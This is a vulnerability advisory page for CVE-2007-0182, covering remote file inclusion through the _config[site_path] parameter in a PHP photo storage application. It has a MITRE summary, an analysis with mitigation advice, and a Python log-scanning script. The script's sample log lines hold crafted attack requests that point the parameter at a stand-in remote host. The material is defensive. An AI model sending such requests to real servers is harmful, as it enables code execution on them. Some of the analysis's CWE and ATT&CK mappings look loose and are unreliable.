CVE-2007-0182 in magic photo storage website
Summary
by MITRE
Multiple PHP remote file inclusion vulnerabilities in magic photo storage website allow remote attackers to execute arbitrary PHP code via a URL in the _config[site_path] parameter to (1) admin_password.php, (2) add_welcome_text.php, (3) admin_email.php, (4) add_templates.php, (5) admin_paypal_email.php, (6) approve_member.php, (7) delete_member.php, (8) index.php, (9) list_members.php, (10) membership_pricing.php, or (11) send_email.php in admin/; (12) config.php or (13) db_config.php in include/; or (14) add_category.php, (15) add_news.php, (16) change_catalog_template.php, (17) couple_milestone.php, (18) couple_profile.php, (19) delete_category.php, (20) index.php, (21) login.php, (22) logout.php, (23) register.php, (24) upload_photo.php, (25) user_catelog_password.php, (26) user_email.php, (27) user_extend.php, or (28) user_membership_password.php in user/. NOTE: the include/common_function.php vector is already covered by another candidate from the same date.
Analysis
by VulDB Data Team • 10/11/2025
This vulnerability represents a critical remote file inclusion flaw in a PHP-based magic photo storage website system that allows attackers to execute arbitrary code on the target server. The vulnerability exists due to improper input validation and sanitization of user-supplied data in multiple administrative and user-facing scripts. Attackers can exploit this by manipulating the _config[site_path] parameter to inject malicious URLs that will be included and executed by the vulnerable PHP application. This type of vulnerability falls under the CWE-88 category for improper neutralization of special elements used in an OS command and is classified as CWE-94 for arbitrary code execution through code injection.
The technical implementation of this vulnerability occurs when the application uses include or require statements with user-controllable parameters without proper validation. When an attacker supplies a malicious URL in the _config[site_path] parameter, the PHP interpreter processes this input and includes the remote file, effectively executing any PHP code contained within it. The affected files span across multiple directories including admin/, include/, and user/ directories, indicating a widespread vulnerability throughout the application's codebase. The attack vectors cover critical administrative functions such as password management, email configuration, membership handling, and user registration processes, making this vulnerability particularly dangerous.
The operational impact of this vulnerability is severe as it provides attackers with complete control over the affected web server. An attacker could upload malicious PHP shells, steal sensitive data, modify database contents, or use the compromised system as a launchpad for further attacks within the network. The vulnerability affects both administrative and user-facing components, meaning that even a low-privilege user account could potentially exploit this flaw if they can manipulate the _config[site_path] parameter. This aligns with ATT&CK technique T1059.007 for command and script interpreter and T1078.004 for valid accounts, as attackers would leverage legitimate application functionality to execute malicious code.
The attack surface includes multiple entry points across the application's functionality, making detection and remediation challenging. The vulnerability affects critical system components including database configuration files, email settings, membership management, and user authentication processes. This broad scope means that an attacker could compromise the entire system by exploiting any one of these vectors. Organizations should implement proper input validation, disable remote file inclusion, and use allow_url_include=Off in php.ini configuration to mitigate this vulnerability. Additionally, the principle of least privilege should be enforced, and all user inputs should be properly sanitized before being used in include or require statements.
The vulnerability demonstrates poor secure coding practices and highlights the importance of input validation and output encoding in web applications. The flaw represents a classic case of insecure direct object reference combined with improper input sanitization, allowing attackers to manipulate the application's include path. Security best practices dictate that all external inputs should be validated against a whitelist of acceptable values, and that remote file inclusion should be disabled unless absolutely necessary. This vulnerability also underscores the importance of regular security audits and code reviews to identify and remediate such critical flaws before they can be exploited by malicious actors in the wild.
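One way to look for the request pattern described above in web server access logs, as an added example that is not part of the MITRE or VulDB text: the script flags requests to .php scripts under admin/, include/ or user/ that carry a URL in the _config[site_path] parameter. The combined log format, the sample lines, the /photos/ install prefix and the example.invalid host are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "_config[site_path]"                  # parameter named in the CVE text
AFFECTED_DIRS = {"admin", "include", "user"}  # directories named in the CVE text
# Value that starts with "scheme://" or a protocol-relative "//".
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request line of a combined-format log entry (log format is an assumption).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses and host names are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2007:10:00:01 +0000] "GET /user/login.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Jan/2007:10:00:07 +0000] "GET /admin/index.php?'
    '_config[site_path]=http://files.example.invalid/inc HTTP/1.1" 200 1024',
    '192.0.2.44 - - [10/Jan/2007:10:00:09 +0000] "GET /photos/user/register.php?'
    '_config%5Bsite_path%5D=http%3A%2F%2Ffiles.example.invalid%2Finc HTTP/1.1" 200 980',
    '192.0.2.10 - - [10/Jan/2007:10:00:12 +0000] "GET /user/index.php?page=2 HTTP/1.1" 200 733',
]


def suspicious_requests(log_lines):
    """Return (line_no, script_path, value) for each request that passes a
    URL in PARAM to a .php script inside one of AFFECTED_DIRS."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        path = unquote(parts.path)
        segments = [s for s in path.split("/") if s]
        if len(segments) < 2 or segments[-2] not in AFFECTED_DIRS:
            continue
        if not segments[-1].lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes names and values, so the encoded
        # form _config%5Bsite_path%5D is matched as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == PARAM and REMOTE_VALUE.match(value):
                hits.append((line_no, path, value))
    return hits


if __name__ == "__main__":
    for line_no, path, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {path} received {PARAM}={value}")
```

Access logs normally record only the query string, so this check covers requests where the parameter is sent in the URL and needs a WAF or application-level log for anything sent in a request body.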